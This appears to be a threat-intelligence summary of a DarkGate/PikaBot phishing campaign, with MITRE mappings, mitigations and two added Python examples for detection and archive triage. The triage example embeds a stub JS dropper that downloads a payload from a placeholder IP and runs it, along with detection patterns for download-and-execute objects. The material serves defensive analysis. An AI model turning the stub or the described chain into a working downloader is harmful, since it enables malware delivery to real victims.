Keypoints
- The campaign began after QakBot activity subsided and mirrors QakBot TTPs, including timeline and delivery patterns.
- Initial access is commonly gained via hijacked email threads containing malicious links, increasing recipient trust.
- Phishing URLs include unique patterns and checks (browser and geolocation) that restrict access to intended victims.
- Most common infection chain: URL → ZIP archive → JS Dropper (.js) → remote payload download and execution (DarkGate or PikaBot).
- DarkGate and PikaBot act as loaders with anti-analysis features; both can fetch and install additional payloads (recon tools, miners, ransomware).
- Other delivery methods observed include Excel-DNA (.xll) add-ins, VBS downloaders, and LNK shortcut downloaders.
MITRE Techniques
- [T1566.002] Spearphishing Link – Use of targeted messages with malicious links delivered via hijacked threads to induce clicks; quote: “…The campaign begins with a hijacked email thread to bait users into interacting with a URL…”
- [T1190] Exploit Public-Facing Application – Threat actors may obtain hijacked threads through Exchange ProxyLogon exploitation; quote: “…hijacked email threads that may be obtained from Microsoft ProxyLogon attacks (CVE-2021-26855).”
- [T1199] Trusted Relationship – Leveraging existing conversation context to increase recipient trust and likelihood of interaction; quote: “…Responding to email threads creates an added layer of trust between the threat actors and the target…” (Note: ATT&CK scopes T1199 to access gained through a third party such as an MSP or supplier; the trust exploited here is conversational, so treat this mapping as loose and rely on T1566.002 for the behaviour itself.)
- [T1105] Ingress Tool Transfer – JS droppers reach out to external URLs to download and write malicious payloads to disk; quote: “…a JS Dropper… used to reach out to another URL to download and run malware.”
- [T1497] Virtualization/Sandbox Evasion – Malware contains checks and evasive techniques to detect/avoid sandboxes, VMs, and debuggers; quote: “…contains several evasive techniques to avoid sandboxes, virtual machines, and other debugging techniques.”
- [T1204] User Execution – Delivery relies on the user opening the downloaded archive and running the .js/.vbs/.lnk/.xll inside it (Windows Script Host for .js/.vbs, Excel for .xll); T1204.002 Malicious File is the closest sub-technique; quote: “…This URL downloads a ZIP archive that contains a JS file that is a JS Dropper…”
Indicators of Compromise
- [File Type] Malicious archive/dropper context – .zip containing .js dropper (JS Dropper), and other similar archive-delivered droppers
- [File Type] Script/add-in loaders – .js (JS Dropper), .vbs (VBS downloader), .lnk (LNK downloader), .xll (Excel-DNA add-in)
- [Vulnerability] Exploited service context – CVE-2021-26855 (ProxyLogon) used to obtain hijacked email threads
- [URL Pattern] Phishing URL context – URLs with unique patterns that gate delivery on browser and geolocation checks (e.g., Chrome + US) as shown in the campaign examples and figure references; a detonation sandbox or analyst outside the allowed browser/region is served nothing or a benign page, so a clean replay of the link is not evidence that it is harmless
The attack typically begins with a hijacked corporate email thread carrying a phishing URL that gates delivery on the visitor's environment (browser type and geolocation). When a victim in the allowed context follows the link, the site serves a ZIP archive containing a JavaScript dropper; once the user extracts and runs the .js (through Windows Script Host), the dropper contacts a remote host, downloads the loader payload (DarkGate or PikaBot), writes it to disk, and executes it. The dropper therefore performs the ingress tool transfer (T1105), while every step up to that point depends on user execution (T1204).
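The chain above (script host started on a .js/.vbs from a user-writable path, an outbound connection by that process, then a child process it spawns) is what host telemetry shows, so it is what a detection should correlate. The following is an added example written for this page, not Cofense's tooling: the event schema is a simplified stand-in for Sysmon EID 1 (ProcessCreate) and EID 3 (NetworkConnect), the 120-second window is an assumption, and the log lines are constructed.

```python
"""Correlate script-host telemetry into the dropper chain: wscript/cscript running a
.js/.vbs from Downloads or %TEMP%, followed by an outbound connection from that process
and a child process it launches. Added example; schema and log lines are constructed."""
from dataclasses import dataclass
from datetime import datetime, timedelta
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# The script must sit under Downloads or %TEMP%, where a browser-fetched ZIP gets opened.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(?:Downloads|AppData\\Local\\Temp)\\", re.I)
SCRIPT_PATH = re.compile(r'([A-Za-z]:\\[^"]+?\.(?:js|jse|vbs|vbe|wsf))\b', re.I)
CHAIN_WINDOW = timedelta(seconds=120)   # assumption: download and execution follow within 2 min

@dataclass
class Event:
    ts: datetime
    kind: str              # "process" or "network"
    pid: int
    image: str
    cmdline: str = ""
    parent_pid: int = 0
    parent_image: str = ""
    dest: str = ""         # network events only: "ip:port"

def parse_event(line: str) -> Event:
    # constructed pipe-delimited format: ts|kind|pid|image|cmdline|ppid|parent_image|dest
    ts, kind, pid, image, cmdline, ppid, pimage, dest = line.split("|")
    return Event(datetime.fromisoformat(ts), kind, int(pid), image, cmdline, int(ppid), pimage, dest)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def script_from_user_path(cmdline: str):
    """Return the script path a script host was told to run, if it lives in a user-writable dir."""
    m = SCRIPT_PATH.search(cmdline)
    return m.group(1) if m and USER_WRITABLE.search(m.group(1)) else None

def detect_dropper_chains(lines):
    events = sorted((parse_event(l) for l in lines if l.strip()), key=lambda e: e.ts)
    alerts = []
    for e in events:
        if e.kind != "process" or basename(e.image) not in SCRIPT_HOSTS:
            continue
        script = script_from_user_path(e.cmdline)
        if script is None:
            continue   # e.g. an admin script under C:\Scripts: legitimate script-host use
        later = [x for x in events if e.ts < x.ts <= e.ts + CHAIN_WINDOW]
        net = [x for x in later if x.kind == "network" and x.pid == e.pid]
        children = [x for x in later if x.kind == "process" and x.parent_pid == e.pid]
        if net and children:   # T1105 (fetch) followed by execution of what was fetched
            alerts.append({"pid": e.pid, "script": script, "dest": net[0].dest,
                           "child": basename(children[0].image), "ts": e.ts.isoformat()})
    return alerts

# Constructed sample: explorer -> wscript.exe running a .js extracted from a ZIP in %TEMP%,
# which connects out and then launches an AutoIt interpreter dropped beside it (DarkGate-style),
# plus a benign cscript run of an admin script under C:\Scripts that also talks to the network.
SAMPLE_LOG = [
    "2023-11-06T09:12:01|process|4120|C:\\Windows\\explorer.exe||1000|C:\\Windows\\winlogon.exe|",
    "2023-11-06T09:12:05|process|5280|C:\\Windows\\System32\\wscript.exe|"
    "\"C:\\Windows\\System32\\wscript.exe\" \"C:\\Users\\jdoe\\AppData\\Local\\Temp\\Temp1_Report.zip\\Report_1106.js\""
    "|4120|C:\\Windows\\explorer.exe|",
    "2023-11-06T09:12:07|network|5280|C:\\Windows\\System32\\wscript.exe||0||203.0.113.45:443",
    "2023-11-06T09:12:09|process|5310|C:\\Users\\jdoe\\AppData\\Local\\Temp\\AutoIt3.exe|"
    "C:\\Users\\jdoe\\AppData\\Local\\Temp\\AutoIt3.exe script.a3x|5280|C:\\Windows\\System32\\wscript.exe|",
    "2023-11-06T09:15:00|process|6000|C:\\Windows\\System32\\cscript.exe|"
    "cscript.exe C:\\Scripts\\inventory.vbs|4120|C:\\Windows\\explorer.exe|",
    "2023-11-06T09:15:02|network|6000|C:\\Windows\\System32\\cscript.exe||0||10.0.0.5:445",
]

if __name__ == "__main__":
    for alert in detect_dropper_chains(SAMPLE_LOG):
        print(alert)
```

The benign cscript run is deliberately included: script hosts are used legitimately by logon and inventory scripts, so the path condition (Downloads or %TEMP%) and the requirement for both a network connection and a child process are what keep the rule from firing on them. Extending the rule to excel.exe loading an .xll and then spawning a process covers the Excel-DNA variant with the same structure.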
Both DarkGate and PikaBot are loaders with anti-analysis and sandbox-evasion routines. DarkGate commonly arrives as AutoIT scripts (often several AutoIT files run in sequence) and supports plugin-like modules for credential theft, remote access, crypto-mining and privilege escalation; PikaBot, first seen in 2023, excludes victims in CIS countries and checks for sandboxes and VMs before proceeding. A successful infection enables follow-on activity: retrieval of additional payloads (reconnaissance tools, miners, ransomware) and, depending on the modules deployed, privilege escalation or lateral movement.
Operators have experimented with delivery mechanisms beyond JS droppers: Excel-DNA XLL add-ins that fetch the payload when Excel loads them, VBS downloaders run through cscript/wscript, and malicious LNK shortcuts whose target launches the download. Because the archive arrives through a link rather than as an attachment, mail-attachment filtering alone does not cover this campaign. Detection and mitigation should block or quarantine downloaded archives containing script or add-in members (.js, .vbs, .xll, .lnk), change the default handler for .js/.vbs away from Windows Script Host so a double-click does not execute them, alert on wscript.exe, cscript.exe or excel.exe making outbound connections or spawning new processes, monitor unusual external downloads, and keep Exchange patched against ProxyLogon (CVE-2021-26855), bearing in mind that patching does not recover threads already stolen in an earlier compromise.
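Before anyone opens a link-delivered archive, the cheapest check is static: list the members whose type matches the droppers named in this summary (.js/.vbs/.lnk/.xll) and pull the download-and-execute indicators and URLs out of any text script. The following triage routine is an added example written for this page, not Cofense's tooling; the in-memory ZIP and the script inside it are constructed, and the script is an incomplete stand-in that only carries the strings a dropper would use and is never executed.

```python
"""Static triage of an archive-delivered dropper: flag risky member types and extract
the COM objects and URLs a WSH script needs to fetch, write and run a payload.
Added example; the archive and its contents are constructed below."""
import io
import re
import zipfile

RISKY_EXT = {
    ".js": "JS dropper", ".jse": "JS dropper", ".wsf": "script host file",
    ".vbs": "VBS downloader", ".vbe": "VBS downloader",
    ".lnk": "LNK downloader", ".xll": "Excel add-in (Excel-DNA)",
}
TEXT_SCRIPT_EXT = {".js", ".jse", ".wsf", ".vbs", ".vbe"}
# COM objects a WSH script needs to fetch a payload, write it to disk, and run it
INDICATORS = {
    "http_client": re.compile(r"MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest", re.I),
    "file_write":  re.compile(r"ADODB\.Stream|Scripting\.FileSystemObject", re.I),
    "exec":        re.compile(r"WScript\.Shell|Shell\.Application", re.I),
}
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?/[^\s'\"]*", re.I)

def ext_of(name: str) -> str:
    i = name.lower().rfind(".")
    return name[i:].lower() if i >= 0 else ""

def triage_archive(data: bytes) -> dict:
    """Return a verdict plus the evidence: risky members, URLs and indicators found."""
    report = {"members": [], "urls": set(), "indicators": set(), "verdict": "clean"}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            ext = ext_of(info.filename)
            if ext not in RISKY_EXT:
                continue
            report["members"].append((info.filename, RISKY_EXT[ext]))
            if ext in TEXT_SCRIPT_EXT:      # .lnk and .xll are binary: flagged by type only
                text = zf.read(info).decode("utf-8", "replace")
                for key, rx in INDICATORS.items():
                    if rx.search(text):
                        report["indicators"].add(key)
                report["urls"].update(URL_RE.findall(text))
    if report["members"]:
        report["verdict"] = "suspicious"     # a script or add-in inside a mailed/downloaded archive
    if {"http_client", "exec"} <= report["indicators"]:
        report["verdict"] = "dropper"        # fetches something and runs it: the chain above
    return report

# Constructed stand-in for an archive-delivered JS dropper (incomplete on purpose; never run).
SAMPLE_JS = (
    "var req = new ActiveXObject('MSXML2.XMLHTTP');\n"
    "req.open('GET', 'http://198.51.100.7/f/payload.bin', false);\n"
    "var out = new ActiveXObject('ADODB.Stream');\n"
    "new ActiveXObject('WScript.Shell').Run(path);\n"
)

def build_sample_zip(with_dropper: bool = True) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "constructed benign member")
        if with_dropper:
            zf.writestr("Report_1106.js", SAMPLE_JS)
    return buf.getvalue()

if __name__ == "__main__":
    print(triage_archive(build_sample_zip()))
```

Treat the indicator matching as a first filter rather than a verdict: real JS droppers are obfuscated, and splitting "MSXML2.XMLHTTP" across concatenated strings defeats the regexes, so a member that is flagged only as "suspicious" by type still deserves detonation in a sandbox that satisfies the campaign's browser and geolocation gate.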
Read more: https://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/